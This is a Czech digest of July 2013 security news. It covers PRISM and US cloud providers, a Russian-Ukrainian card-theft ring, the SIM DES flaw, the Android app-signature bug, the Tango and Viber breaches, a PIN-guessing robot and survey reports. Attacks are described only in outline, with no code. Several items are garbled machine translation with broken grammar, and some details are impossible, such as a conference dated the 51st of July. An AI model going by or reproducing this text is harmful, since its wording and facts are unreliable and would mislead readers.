Podle některých odborníků je ovšem Baliçovo tvrzení diskutabilní, protože podle údajů, které zveřejnil, nelze žádné existující účty dohledat. Apple ve středu zaslal všem vývojářům e-mail, ve kterém jim oznámil, že bude web pro ně obnovovat v několika krocích, a že vytvořil novou stránku s průběžnými informacemi o postupu obnovování služeb. Apple v e-mailu současně přislíbil, že obnovený web bude mnohem odolnější proti případným útokům.
Aféra PRISM se dotýká poskytovatelů cloudu v USA
Američtí provozovatelé cloudu nesou následky odhalení špionážního programu NSA. Dotazník aliance CSA ukazuje, že zahraniční firmy ruší smlouvy a cloudové služby objednávají jinde.
Špionáž | KyberSecurity
Zahraniční zákazníci amerických cloudových poskytovatelů jsou očividně otřeseni zjištěním, do jaké míry a jak snadno americká bezpečnostní agentura NSA monitoruje a sbírá data o uživatelích. Podle dotazníku Cloud Security Alliance (CSA) 10 procent z 207 představitelů neamerických společností vypovědělo smlouvu s americkými provozovateli služeb po tom, co vyšel najevo špionážní program PRISM.
Pouze jedna třetina respondentů nehodlá z odhalených informací vyvodit závěry týkající se jejich používání amerických cloudových služeb. Studie CSA proběhla mezi 25. červnem a 9. červencem a podle Jima Reavise, výkonného ředitele CSA, ukázala větší negativní ohlas, než očekával. „Předpokládal jsem, že více lidí chápe, jak jsou tyto aktivity rozšířené i v jiných zemích.“
Většina dotázaných žádá větší transparentnost toho, jak americká vláda využívá zákon FISA (Foreign Intelligence Surveillance Act), který ji umožňuje žádat uživatelská data od amerických internetových společností. Google, Microsoft, Yahoo, ale i další firmy musí vždy vyhovět podobným požadavkům, ale současně nesmí o nich ani zpětně uveřejnit žádné informace.
Program PRISM byl odhalen v sérii dokumentů, které v minulém měsíci novinářům zpřístupnil dřívější spolupracovník NSA Edward Snowden. (Ten právě žádá o azyl v řadě zemí a v USA již mu nehrozí trest smrti za velezradu.) Pro odbornou veřejnost nebyly až tak velikým překvapením, obavy o rozsahu amerických špionážních aktivit se objevují poslední desetiletí, přinejmenším od prvních informací o projektu Echeolon z roku 2001.
Ostatně tyto obavy byly konkretizovány ve studii Boj s kyberzločinem a ochrana soukromí v cloudu, kterou v roce 2012 nechal vypracovat Evropský parlament. Její obsah sice nereprezentuje názory Evropského parlamentu, ale Centra pro evropské politické studie (CEPS), nicméně je jednoznačný.
„Rozsah sledování prováděného v rámci FISA a fakt, že bylo rozšířeno na všechna data ve veřejných cloudech, má rozsáhlé následky pro suverenitu dat Evropské unie a ochranu práv jejích občanů.“ „Jinými slovy je ve Spojených státech legální sledovat z politických důvodů data cizinců, která jsou přístupná v amerických cloudech.“
Po tom, co Snowden uveřejnil své dokumenty, Parlament EU odhlasoval vyšetření dopadu špionážního programu NSA na soukromí a občanská práva všech členů EU. Současně například podle finské bezpečnostní firmy F-Secure se potenciální zákazníci ptají, zda je firma vlastněná subjekty ze Spojených států nebo zda hostuje data zákazníků na území USA. Řada z nich nehodlá nakupovat služby amerických společností nebo vůbec od firmy pocházející ze zemí NATO.
Ale to podle Mikko Hypponena z F-Secure není nic nového, řada zákazníků se zase chce vyhnout službám společností čínských, ruských či izraelských. V podobných situacích vždy ze skandálů nejvíce těží provozovatele služeb z neutrálních zemí.
Největší hackerská operace všech dob: Rusové zcela ovládli burzy v USA 26. července 2013 10:32 Hacking Amerika řeší zatím největší kyberzločin. Obviněným mladým hackerům z Ruska a Ukrajiny se pomocí důmyslného a postupného pronikání do počítačových systémů povedlo dostat do sítí burzy Nasdaq, banky Citibank, PNC Bank, J. C. Penney a řady dalších. Odcizili údaje o 160 milionech kreditních karet a způsobili škody v miliardách korun. Odhaleni byli i díky náhodě. Hackeři získali přístup díky trpělivému hledání zranitelných míst a postupném ovládání Prokuratura amerického státu New Jersey obvinila pětici cizinců ze zřízení rozsáhlé hackerské sítě, s jejíž pomocí připravili své oběti o stovky milionů dolarů. Obviněnými jsou čtyři Rusové a jeden Ukrajinec. K penězům se dostali přes krádeže kódů z kreditních karet, kterých získali nejméně 160 milionů.
Podle amerického ministerstva spravedlnosti jde o největší hackerskou kauzu, jakou kdy americké soudy projednávaly. Mezi oběťmi jsou podle prokuratury například americké společnosti Nasdaq, Visa, J. C. Penney nebo 7-Eleven, francouzský obchodní řetězec Carrefour, belgická banka Dexia a dalších, celkem asi dvanáct velkých nadnárodních firem.
Postupné pronikání zabezpečením Trvalo několik měsíců i let, než se hackerům podařilo nenápadně prolomit několik vrstev zabezpečení počítačových sítí.
skrze chybu na stránce pro poslání zapomenutého hesla se dostali k neošetřenému vstupu do databáze pomocí SQL injekce získali postupně přístup k řadě SQL databází prolomili heslo administrátora systému získali přístup k údajům o kreditních kartách karty duplikovali a z bankomatů vybrali miliony dolarů jiné údaje o kartách prodávali (10-50 dolarů za kreditní kartu) Obvinění Rusové a Ukrajinec se nezákonnou činností podle vyšetřovatelů zabývali přinejmenším sedm let. Kódy z kreditních karet gang podle policie získal průnikem do počítačových sítí postižených firem. Získané kódy pak prodával přes prostředníky do celého světa. S pomocí odcizených kódů zloději účty vybírali.
Mladíci z Ruska a Ukrajiny Podle agentury Reuters byli obviněni Rusové Vladimir Drinkman, Alexandr Kalinin, Roman Kotov (32) a Dmitrij Smilaněc (29) a Ukrajinec Mychajlo Rytikov (26). Drinkman podle žalobců pobývá v Nizozemsku a úřady jednají o jeho vydání, další z obviněných, Smilaněc, byl již z Nizozemska vydán a měl by se před americkým soudem objevit příští týden. Kde se nacházejí tři zbývající muži není jasné. Americká prokuratura přesto všechny obviněné jmenovala, což je neobvyklý postup, který měl podle zdrojů agentury Reuters "potrestat nespolupracující Ruskou policii".
Drinkmana a Kalinina obžalovací spis označuje za protřelé hackery, kteří se specializují na pronikání do počítačových sítí nadnárodních společností, finančních institucí a firem realizujících síťové platby. Specializací obviněného Kotova je údajně získávání dat z nabouraných sítí. Rytikov obstarával anonymní webové adresy, z nichž hackeři své útoky prováděli, a Smilaněc ukradené kódy bankovních karet prodával.
Pětice je obžalována ze spiknutí za účelem internetové loupeže. Čtyři Rusy navíc soud obvinil z neoprávněného pronikání do počítačových sítí.
Překupníci, kteří od gangu získaná data kupovali, přeprodávali údaje o platebních kartách zájemcům přes internetové sítě nebo přímo. Cena bezpečnostního kódu z jedné americké karty byla údajně stanovena na deset dolarů (200 korun), v případě kanadské karty 15 dolarů (300 korun) a evropské až 50 dolarů (1 000 korun).
Skupina hackerů ukradená data ukládala na serverech po celém světě, například v amerických státech New Jersey, Pensylvánie, Kalifornie nebo Illinois, ale i v Lotyšsku, Nizozemsku, na Bahamách, na Ukrajině, v Panamě nebo v Německu. Překupníci získané kódy vkládali do paměti nových platebních karet. Uložené peníze pak zloději s pomocí těchto karet vybírali z bankomatů nebo je utráceli za zboží.
"Ovládli jsme Nasdaq!" zněla jedna z řady odposlechnutých textových zpráv, které si mezi sebou hackeři vyměnili. K úspěšnému napadení stránek burzy Nasdaq došlo skrze zranitelnost ve stránce pro zaslání zapomenutého hesla a následné proniknutí díky SQL injekci.
K odhalení gangu přispěla náhoda Zatím největší známý finanční kyberzločin v USA se podařilo odhalit díky kombinaci moderních technologií, houževnaté práce detektivů a čirého štěstí, uvedla agentura Reuters.
Případ personálně navazuje na případ hackera Alberta Gonzaleze z Miami. Ten byl v roce 2008 dopaden a nyní sedí ve vězení za krádež asi 90 milionů kreditních a platebních karet mnoha společností, včetně OfficeMax nebo Forever 21. S Gonzalezem zřejmě spolupracoval i nyní vyšetřovaný Smilaněc, který měl být zodpovědný za finanční správu celé hackerské operace.
Odhalení předcházely roky vyšetřování. Spolupracující hackeři byli ve spisech dlouho označeni jako "Hacker 1" a "Hacker 2", protože ani NSA prý neznala jejich jména.
K usvědčení Smilaněce pomohl i jeho koníček: jako člen moskevského herního týmu Moscow 5 jezdil po světě a hrál počítačové hry. Agenti si všimli, že často cestuje s jiným známým spolupracovníkem Gonzaleze, Vladimirem Drinkmanem.
Poslední výlet se hackerům nevydařil. "Měli jsme štěstí a našli jsme největšího hackera na světě," svěřil se agentuře Reuters zdroj obeznámený s vyšetřováním. Drinkman totiž zveřejnil fotky ze svého výletu a nechal zapnutý mobil, což policii umožnilo odhadnout, ve kterém hotelu jej najdou. Zavolali do hotelu, kde byli ujištěni, že tito hosté ještě spí. Ráno už si je vyzvedla nizozemská policie.
Vzestup sofistikovaného malwaru
Publikováno dne 25.07.2013 Viry
Nedávné Enterprise Strategy Group (ESG) výzkumná studie zaměřená na pokročilé Malware Protection a detekci. Studie odhalila, že podnikové organizace jsou vidět nárůst sofistikovanějšího malware a dělat to strategickou prioritou pro přidání další vrstvy zabezpečení koncových bodů a chránit své organizace proti pokročilých zero-day a polymorfní ohrožení běžně používané pro cílené útoky.
Na základě svého průzkumu 315 Severní Americe na bázi IT bezpečnostních odborníků, kteří pracují na podnikové úrovni organizace (1000 a více zaměstnanci), ESG našel většina respondentů viděli uptick ve více sofistikovaných a cílené útoky škodlivého softwaru během posledních 24 měsíců. Nicméně , 62 procent dotazovaných organizací řekl, zabezpečení koncových bodů software není účinné pro odhalování zero-day a / nebo polymorfní malware, který opustí jejich zranitelnost vůči těmto útokům. "Jako kybernetické útoky stále důmyslnější, zabezpečení IT odborníci si uvědomují, že spoléhání se na jediný jedna vrstva zabezpečení koncových bodů nestačí. Každý koncový bod je třeba více vrstev detekce malwaru s cílem zajistit úplnou ochranu, "řekl Marcin Kleczynski, generální ředitel společnosti Malwarebytes. "Skutečností je, že většina antivirových produktů bude chybět devět z deseti zero-day malware hrozby, a když odstupňovaný přístup bloky pokročilé hrozby, které tradiční antivirové skenery nemusí odhalit." Kromě toho studie zjistila, že nejpravděpodobnější cestou, pro malware útoku, a důvod pro úspěšných útoků škodlivého softwaru, byl nedostatek uživatelské znalosti o bezpečnostních rizicích z internetu. IT bezpečnost dotazovaní odborníci věří, zaměstnanec kliknutím na infikované URL vyslaného do e-mailu byl s největší pravděpodobností vektor malware infiltrovat jejich organizace. Další vhodné cesty pro malware ohrozit organizace systému včetně zaměstnanců otevření infikovaného e-mailu a nevědomky kliknutím na infikované URL při surfování na webu. "Pokud jde o řízení rizika škodlivého Podniky by se nejlépe zavedením odstupňovaný přístup pomocí proaktivní a reaktivní obranné linie prostřednictvím svých sítí. Antivirový software hraje klíčovou roli při ochraně organizace, ale to by nemělo být jedinou metodou, jak zabránit malware útoky, "řekl Jon Oltsik, senior hlavní analytik společnosti ESG. "Navíc, někdy největší chyba v organizaci, je počítač uživatele. . Vzhledem k tomu, zaměstnanecké akce mohou výrazně ovlivnit počítačové bezpečnosti, vzdělávání zaměstnanců na potenciální hrozby a jak se jim vyhnout by se měly stát prioritou " Kromě odhalení těchto zjištění, studie také ukázala, že:
29 procent dotazovaných organizací, které utrpěly úspěšný útok malwaru věří, že rostoucí využívání sociálních sítí je odpovědný za těmito útoky V průměru trvá 57 procent respondentů hodin rozpoznat, že IT majetku, byl napaden malware a 19 procent dny 74 procent podniků se zvýšily jejich bezpečnostní rozpočtu v průběhu posledních 24 měsíců v přímé reakci na složitější škodlivého softwaru 62 procent respondentů věří, že jejich host-based bezpečnostní software není účinné pro odhalování Zero Day a / nebo polymorfní hrozby 85 procent IT bezpečnostních odborníků, vzhledem k tomu všechno, co vědí o kybernetické bezpečnosti, se obávají o nějaký druh masivní kybernetické útoky, které by mohly ovlivnit kritické infrastruktury, ekonomiky, a / nebo národní bezpečnosti 66 procent z US-založené respondentů nevěří, federální vláda USA je na tom dost pomoci soukromého sektoru vyrovnat se s aktuální kybernetické bezpečnosti a hrozeb.
DHS nastavit "kybernetické obchod" za vlád agentur
Publikováno dne 25. července 2013. KyberSecurity
US Department of Homeland Security byl pověřen vytvořením centralizované nákupní rozbočovač, ke kterému všechny ostatní americká federální, státní a místní úřady nám získat nástroje a odborné znalosti pro všechny jejich potřeby kybernetické bezpečnosti. Podle Businessweek zprávy DHS byla dána 6000000000 dolarů strávit v příštích pěti letech, aby se to stalo a je v současné době přijímá nabídky. Lockheed Martin, Northrop Grumman a další velcí dodavatelé soupeří o kus koláče, stejně jako několik velkých firem kybernetické bezpečnosti. počet společností, jejichž nabídka bude přijata byla omezena na pět. Tento program je přímým důsledkem prezidenta Obama z února dekret , s níž za úkol DHS, aby - mimo jiné - zkontrolovat zda civilní vládě sítě jsou vyrobeny odolné vůči kybernetickým útokům. A i když to bylo začít s civilními vládními agenturami v mysl, inteligence agentury a ministerstva obrany budou také moci využít, a získat software, hardware a na poradenské služby nabízejí přes něj. Jedním z hlavních důvodů pro jeho zřízení bylo vyřešit problém udržet menších agentur obranu nahoru, jak tyto agentury don ' t dost velký rozpočet, aby tak sám, a podpořit podávání informací a podrobnosti útoků jsou předloženy.
Zranitelnost SIM je možné snadno opravit
Operátoři i vydavatelé karet SIM se usilovně pustili do práce na odstranění dvou závažných bezpečnostních chyb v technologii karet SIM, která umožňuje získat vzdálený přístup k SIM. Podle výzkumníka, který tyto chyby objevil, by oprava neměla být příliš složitá.
Mobil | Hacking | Zranitelnosti
Karsten Nohl z bezpečnostní výzkumné laboratoře v Berlíně v pondělí oznámil, že miliony karet SIM pravděpodobně stále používají k ověřování bezdrátových aktualizací zastaralý způsob šifrování používaný v 70. letech minulého století. Podle Nohla je možné určitý druh SIM požádat o zaslání 56bitového klíče standardu DES, který dnes lze rychle prolomit pomocí běžného osobního počítače. Stačilo zaslat fiktivní bezdrátovou aktualizaci, na kterou některé SIM reagují chybovou zprávou s přiloženým šifrovacím klíčem. Do SIM je po prolomení klíče možné zaslat spyware, který získá přístup k důležitým údajům na kartě pomocí virtuálního stroje Java, kterou podporuje většina SIM.
Nohl odhadl, že takto je zranitelných zhruba 500 milionů telefonů, bez ohledu na značku a typ, protože se zneužívají funkce SIM nezávislé na přístroji, ve kterém je vložená. K odhadu dospěl po prozkoumání vzorku 1000 SIM od různých, především evropských, operátorů. Tuto zranitelnost je ovšem možné opravit pomocí principu, kterým ji lze i zneužít, tedy pomocí bezdrátové aktualizace. Navíc zcela bez nutnosti zásahu uživatele. U některých karet stačí podle Nohla přepnout ze zastaralého algoritmu DES na novější a odolnější Triple DES, který také podporují.
Operátoři navíc mohou podle Nohla zakázat zasílání SMS s nebezpečným kódem z neznámých zdrojů. Technologie SIM totiž umožňuje komunikovat s kartou pomocí speciálních SMS obsahujících kód, které operátoři používají k vzdáleným změnám jejich nastavení. Tyto zprávy jsou ovšem velmi specifické a není proto těžké je detekovat. Pokud tedy zašle útočník SMS obsahující kód pro kartu SIM, mohou operátoři zabránit v jejím odeslání na požadované číslo.
Protože se problém netýká jen několika operátorů, ale v podstatě všech, Nohl předal výsledky svého šetření Asociaci GSM. Podle něj se členové asociace nesnaží o vzájemné obviňování s výrobci karet, ale na odstranění této slabiny aktivně spolupracují. Nohl by měl celou problematiku zveřejnit 51. července na konferenci Black Hat security. Do té doby by si tedy měli operátoři s opravou této zranitelnosti pospíšit.
Fiberio je první dotykový displej, který čte otisky prstů, jak jej používat Zaslal: 24 červenec 2013 08:36 PDT Biometrika Nový optický stolní PC systém je prvním, který "čte" otisky prstů, jak lidé používají to - a mohou tvořit základ bezpečného systému identifikace transakce v obchodech nebo bank.
Senzory uvnitř Fiberio "číst" odražené světlo od stolu povrchu, s dostatečně podrobně identifikovat otisky prstů jako uživatel dotkne povrchu. Uživatelé mohou být identifikovány okamžitě a bez problémů, protože toto zařízení používat. Prototyp stroje je multi-touch, takže více uživatelů může používat v každém okamžiku.
"Fiberio je první interaktivní stolní systém, který ověřuje uživatele při dotyku interakce - nenápadně a bezpečně pomocí biometrických prvků otisků prstů, což dává uživatelům volnost v plnění identifikační tokeny," říká návrhář Christian Holz.
Zadní projekce "Stolní PC" budou podrobně popsány v papírové Fiberio: Dotykový displej je citlivý otisky prstů, které mají být prezentovány na ACM symposium o softwaru User Interface a technologie.
Holz naznačuje, že Fiberio by mohly být použity v bankách na "ověřte, zda daný uživatel má oprávnění k provedení aktuální činnosti -. Například schvalovat faktury nad určitou hodnotu"
V tabulce by se určit jak ředitele banky a zákazník okamžitě Holz napovídá - pracuje se jak, zda je správa měla pravomoc schvalovat faktury, a též bezpečně identifikovat zákazníka.
"Klíč, který umožňuje Fiberio zobrazit obraz a smysl pro otisky prstů současně je jeho displej materiál: optické desky," říká Holz.
Fiberio funguje pomocí zadní projekční systém, podobný tomu, který našel v počítači Microsoft Surface tabulky, které jsou často používané v point-of-prodej situací. Projekční systém umožňuje zařízení "nahrazují slovy" odrazy v desce - systém nemohl fungovat v jeho současné podobě v běžných tablety a smartphony.
ESET výzkumný pracovník David Harley popisuje výhody biometrických systémů Žijeme zabezpečení blogu, "Smutnou skutečností je, statické hesla jsou zdánlivě levné, ale koncepčně nevyhovující řešení velmi obtížný problém, zejména pokud nejsou chráněny doplňkové techniky. Biometrie a jednorázová hesla a žetony jsou mnohem bezpečnější, zejména pokud jsou prováděny v hardwaru jako dvoufaktorové autentizace opatření. "
Příspěvek Fiberio je první dotykový displej, který čte otisky prstů, jak jej použít poprvé objevil na Žijeme zabezpečení.
Tango messaging aplikace pirát - "miliony" uživatelských informace unikly 23 červenec 2013 23:03 PDT Mobil | Hacking | Viry Populární messaging aplikace Tango byl hacknut - a hacker skupina Syrská armáda Elektronická (SEA) tvrdí, že přístup "miliony" osobních informací uživatelů, stahování 1,5 terabytů informací včetně soukromých telefonních čísel, seznamy kontaktů a e-mailů.
Aplikace používá více než 100 milionů lidí. Tango potvrdil porušení přes jeho zdroj Twitter, řka: "Tango zažil kybernetické vniknutí, která vyústila v neoprávněnému přístupu k některým údajům. Pracujeme na zvýšení našich bezpečnostních systémů. "Společnost také omluvil a řekl:" "Upřímně se omlouváme za nepříjemnosti, které toto porušení mohlo způsobit našim členům."
"Hodně z informací obsažených v databázích, které byly staženy bude doručena syrské vlády," skupina tvrdila v příspěvku na svých internetových stránkách. "Obsah databáze milionů app počtu uživatelů telefonů a kontaktů a jejich emailsMore než 1,5 TB denní zálohování serverů sítě byl úspěšně stažen."
Hackeři údajně získal přístup díky použití Tango ze zastaralé verze WordPress, podle E Hacking News.
Skupina také cílené aplikaci pro chat Viber tento týden, i když tvrdí, že společnost jen malé systémy byly ovlivněny.
"Dnes Podpora Viber místo bylo poškozeno po zaměstnanec Viber bohužel padl za oběť útoku phishing e-mail," uvedla společnost v prohlášení. "Phishing povolen přístup do dvou menších systémů: zákaznická podpora panelových a podpora administrace systému. Informace z jednoho z těchto systémů bylo zveřejněno na znetvořil stránce. "
V příspěvku na jeho oficiálních stránkách, SEA tvrdil, že "pirát dnes webové stránky a databáze izraelsko-based" Viber "app SEA stáhnout některé z app databází a poté, co jsme získali přístup do některých systémů této aplikace bylo jasné, že pro nás propuse této aplikace je špionáž a sledování jeho uživatelů SEA hacknutý stránku podpory z Viber aplikace a odeslat snímky z jednoho z app systémů kromě app administrátory jména / telefonních čísel. "
Příspěvek Tango messaging aplikace pirát - "miliony" uživatelských informace unikly poprvé objevil na Žijeme zabezpečení.
Robot vs Android: PIN krakování stroj může poškodit jakýkoli kód v hodinách Zaslal: 23 červenec 2013 07:27 PDT Mobil | Incident | Hacking Kód PIN kódy k ochraně Android smartphony nabízejí užitečnou linii obrany proti zločincům - pokud, to znamená, že přístroj padne do rukou robota R2B2.
R2B2 - to znamená robotické rekonfigurovatelných Tlačítko Basher - byl navržen dvou výzkumníků z ISEC a budou předvádět na konferenci Black Hat zabezpečení v Las Vegas. R2B2 můžete "hádat" jakýkoliv Android 4-místný kód PIN do 20 hodin, výzkumníci tvrdí - tím, že prostě se snaží všechny možné kombinace. Video R2B2 v práci si můžete prohlédnout zde.
Justin Engler z ISEC říká, že mnoho firem argumentují, "R2B2 je schopen zpracovat také další esoterické lockscreen druhy, jako vzor trasování. R2B2 může prasknout zásobní Android 4 místný PIN vyčerpávajícím způsobem v 20 hodin. "
"Není nic zastavit někdo hádat všech možných PINů," říká Engler. "Často slyšíme" nikdo nikdy neudělal. "Chtěli jsme vyloučit, že argument. To bylo už jednoduché, je to právě nikdy předtím. Produkty spoléhat na kolíky nebo krátkých hesel muset bránit před online útoky. Doufáme, že s informacemi pro budování těchto zařízení jsou k dispozici veřejnosti, budou dodavatelé provádět softwarové ochrany proti této banální vyšší hardwarové brutální útok. "
Výzkumníci upřímně přiznat, že R2B2 bude zmařen iPhone - zařízení "vyprší" po opakovaných chybných odpovědí, podle zprávy v časopisu Forbes.
"R2B2 může pracovat dotykového displeje nebo fyzických tlačítek. Časy jiných zařízení se liší v závislosti na uzamčení politik a souvisejících obrany, "říkají vědci. Společník heslo robot, C3B0, je určen pro práci s kapacitními dotykovými obrazovkami, a zůstává stále ve vývoji.
"Kapacitní kartézský souřadnicový Bruteforceing Overlay (C3BO) je kombinací elektroniky, jejichž cílem je simulovat elektricky doteky na kapacitní zařízení s dotykovou obrazovkou. C3BO nemá žádné pohyblivé části a může pracovat rychleji než R2B2 v některých případech, "říkají vědci.
Příspěvek Robot vs Android: PIN krakování stroj může poškodit jakýkoli kód, v hodinách se objevil poprvé na Žijeme zabezpečení.
Hesla jsou "příliš riskantní" a měla by být zakázána, říká nový nátlaková skupina Zaslal: 22 červenec 2013 23:12 PDT Šifrování | Podvod Hesla jsou zastaralé a "nevyhnutelně" pád do rukou zločinců, podle nové nátlakovou skupinu, petici proti hesla.
Skupina se zaměřuje na podporu digitálních služeb směřovat k "heslem" méně autentizačních systémů. Petice zahájí 24. července, a opírá se o LaunchKey, OneID a Nok Nok Labs, stejně jako pro správu identit spouštěcí klíč, který nabízí smartphone založený na autentizační systém.
"Protože hesla musí být uloženy na centrálním serveru, jsou místa za úkol chránit před trvalým náporem útoků. Dokonce i nejlepší chráněné servery nakonec padne. Výsledky může stát společnost miliony dolarů, a výrazně dopadu důvěry spotřebitelů, "říká Brennen Byrne, generální ředitel klíč, podle zprávy od PC World.
Pohyb přijde v důsledku řady high-proile porušení kde byl zákaznických dat zpřístupněných nebo ohrožena, včetně útoků na Sony, Ubisoft, denní nabídka místa LivingSocial, LinkedIn, Zappos a Evernote. Pokud jsou hesla publikovány online po takových narušení dat, nejisté volby jako "123456" a "heslo", i nadále patří k nejběžněji používaným.
ESET výzkumný pracovník David Harley říká, že na svém blogu: "Je smutným faktem, statické hesla jsou zdánlivě levné, ale koncepčně nevyhovující řešení velmi obtížný problém, zejména pokud nejsou chráněny doplňkových metod. Biometrie a jednorázová hesla a žetony jsou mnohem bezpečnější, zejména pokud jsou prováděny v hardwaru jako dvoufaktorové autentizace opatření. "
Ostatní nátlakové skupiny jako je rychlé Identity Online (FIDO) Aliance cíl nahradit používání hesel s bezpečným, průmyslu podporovaného protokolu, který je také snadno ovladatelný. FIDO zkoumá technologie, jako otisků prstů, hlasu a rozpoznávání obličeje, a stávající řešení, jako je Near Field Communication (NFC) a jeden jednorázových hesel (OTP), s cílem vytvořit integrované řešení.
Ostatní firmy a vědci se domnívají, divočejší řešení problému - od hesel tetování a ověřování prášky na používání mozkových skenerů pro autentizaci.
Postu Hesla jsou "příliš riskantní" a měla by být zakázána, říká nový nátlaková skupina se objevila na prvním místě Žijeme zabezpečení. Jste přihlášeni k odběru e-mailových aktualizací od Žijeme Security Chcete-li ukončit příjem těchto e-mailů, můžete odhlásit teď. Doručování e-mailů pomocí služby Google Google Inc, 20 West Kinzie, Chicago IL 60610 USA
Android App Chyba zabezpečení Umožňuje únos
23.července 2013 OS | Zranitelnosti | Mobil | Hacking
Vážná zranitelnost Android, připravený být zveřejněny na konferenci blackhat, nyní veřejně známá. Tato chyba zabezpečení umožňuje útočníkům vložení škodlivého kódu do legitimních aplikací bez zrušení platnosti digitálního podpisu.
Android aplikace musí být digitálně podepsán. To umožňuje, aby jeden zajistila kódu v aplikaci nebylo manipulováno s, a také zajišťuje kódu byla poskytnuta úředním vydavatele. Navíc Android využívá app úrovni oprávnění systému, kde každá aplikace musí přiznat a přijmout oprávnění k provedení citlivé úkoly. Digitální podpis brání aplikací a jejich doprovodné oprávnění od uneseno.
Tento závažný Android chyba zabezpečení umožňuje útočníkovi skrýt kódu v legitimní aplikace a využití stávajících oprávnění k provádění citlivých funkcí prostřednictvím těchto aplikací. Podrobnosti o zranitelnosti lze nyní nalézt na internetu a jsou velmi snadno implementovat.
Injekční škodlivého kódu do legitimních aplikací byla obyčejná taktika se zlými úmysly app tvůrci na nějakou dobu. Nicméně, oni předtím potřeba změnit i aplikace a název vydavatele, a také podepsat Trojanized aplikace s vlastním digitálním podpisem. Někdo, kdo zkoumal app údaje mohly okamžitě realizovat aplikace nebyl vytvořen legitimní vydavatele. Nyní, když útočníci již není nutné měnit tyto podrobnosti digitálního podpisu, mohou volně unést legitimní aplikace a dokonce i chytrý člověk nemohl říct, že žaloba byla v novém obalu pomocí škodlivého kódu.
Přidali jsme logika zjišťování pro zranitelné stavu naší backend Norton Mobile Insight systémů a ze čtyř milionů aplikací, ještě neobjevili škodlivý využití zranitelnosti. Objevili jsme několik aplikací, které neúmyslně zneužívají křehkosti, nicméně. Tyto aplikace jsou postaveny na společné sestavení populární nástroj řetěz, který může mít za následek chybu poškozených souborů APK. Bohužel, tato chyba zabezpečení se týká 99 procent zařízení se systémem Android, a obvykle záplaty trvat nějakou dobu být nasazeny výrobců mobilních telefonů a dopravci, pokud vůbec.
Pokud byl škodlivý aplikace je zjištěna zneužití této chyby zabezpečení, budou uživatelé moci chránit instalací aplikace Norton Mobile Security . Po nainstalování aplikace Norton Mobile Security také pravidelně aktualizovat sám přidat více robustní ochranu proti této a budoucích chyb.
Bezpečnostní experti antivirové společnosti Bitdefender odhalili škodlivé programy maskované za regulérní aplikace. Ty zneužívají kritickou bezpečnostní chybu operačního systému Android, kterou mohou počítačoví piráti využít k ovládání počítačových tabletů a chytrých telefonů na dálku.
Viry se ukrývají v aplikacích Rose Wedding Cake Game a Pirates Island Mahjong Free. „Mezi uživateli Androidu jsou tyto programy poměrně populární. První má více než 10 000 stažení a druhý přes 5000,“ uvedl bezpečnostní expert z Bitdefenderu Bogdan Botezatu.
Podle něj však není důvod k panice, protože zatím nebyl zaznamenán případ, kdy by trhlina byla těmito aplikacemi zneužita. Navíc telefony a tablety s nainstalovanou bezpečnostní aktualizací dokážou podvodné programy odhalit.
Zneužita může být jakákoliv aplikace „Oprava již byla poskytnuta našim partnerům. Někteří výrobci, jako například Samsung, již aktualizaci pro svá zařízení vydali,“ uvedla již dříve pro server ZD Net produktová manažerka Androidu Gina Sciglianová.
Právě rychlost je podle bezpečnostních expertů to nejdůležitější, co ovlivní, v jaké míře bude chyba zneužívána. Doposud nebyl evidován podle tvůrců Androidu evidován ani jeden případ.
Uživatelé by tak měli kontrolovat aktualizace u výrobců svých zařízení. „Lze předpokládat, že dostupnost oprav se bude velmi lišit podle toho, o jakého výrobce se jedná,“ podotkl Jeff Forristal, šéf bezpečnostní společnosti Bluebox, která chybu v Androidu odhalila.
Chyba se týká přístrojů s Androidem, které přišly na trh v posledních čtyřech letech. Útočník může s její pomocí ovládat přístroj stejně, jako by jej držel v ruce. Může telefonovat, posílat textové zprávy, ale například i prohlížet uložená hesla. Na dálku dokonce může klidně zapnout i zabudovanou webkameru.
Zranitelnost umožňuje počítačovým pirátům proměnit originální programy v trojské koně, aniž by to byl uživatel schopen při instalaci poznat. Takto zneužita může být prakticky jakákoliv aplikace, upozornily servery VentureBeat a SecurityWeek.
Zvýšení škodlivého provozu DNS dotaz
24. července 2013 Hacking | Počítačový útok | Kriminalita
S ohledem na OpUSA hacktivist kampaně Solutionary zjistil, že útočníci odpovědné za předchozí DDoS útoků na finanční sektor zadlužené různé techniky k provedení kampaně, včetně SQL Injection a XSS , kromě DDoS.
73 procent míst napadených během OpUSA byly hostované na serverech Microsoft IIS Web a že 17 procent z těchto platforem v použití se spuštěnou službou IIS verze 5.0 nebo 5.1, které jsou 10 let starší, než aktuální verze služby IIS (7.5) a už ne podporován Microsoft. Tento dohled vlevo jasné a zřejmé, otvory pro útočníky na využití. Za zmínku stojí uvést, že zatímco Spojené státy na špičce seznamu zemí s servery postižených, na 38 procent, pouze Čína stála od zbytku jako cíl této kampaně. PRISM NSA Projekt zpravodajství dominovala od The Guardian poprvé rozbil příběh. Reakce mezi bezpečnostní profesionály , průmyslovými členů a veřejnosti byl smíšený. NSA prohlášení tvrdí, částečně, že PRISM sbírá data přímo ze serverů poskytovatelů služeb v USA, včetně společností Microsoft, Yahoo!, Google, Facebook, AOL, Paltalk, Skype, YouTube a Apple, ovšem v této době, když Solutionary poznamenal, obavy o bezpečnost a soukromí informací, zejména z neamerických organizací, ale nezaznamenali vliv na klientských operací. Solutionary také shrnul výrazný nárůst škodlivých DNS dotazů a DoS činnosti. Opět platí, že USA a Čína jsou dva nejlepší země původu, registrace 57 procent a 30 procent, respektive, následované Francií a Ruskou federací. Zvýšení DDoS útoků je pravděpodobné, předpověď na základě zpravodajských informací získaných od pozorovaného průzkumných a těžebních kampaních soukromé a komerční poskytovatelé hostingu. "Pozorování Výzkumného Engineering Security Team (SERT) během posledních několika měsíců vedly k závěru, že hacktivist útoky jsou na vzestupu a že titulek řízené bezpečnostní obavy může často trvat pozornost od oprav, které mohou zlepšit defenzivní postoje, "řekl Rob Kraus, ředitel výzkumu, SERT. "Bezpečnost a riziko profesionálové čtení této zprávy, zjistíte, že existuje několik jednoduchých kroků, které mohou být lépe bránit proti zjištěným útoky."
SIM šifrování chyba otevře 500M uživatelů o napadení
23. července 2013. Šifrování | Mobil
Chyba v šifrování technologie používané některými SIM kartami může dovolit útočníkovi, aby byl cílový telefon stáhnout škodlivé aplikace a dokonce účinně naklonovat průkazu uživatele, aby se vydávat za zařízení, německý bezpečnostní výzkumník našel.
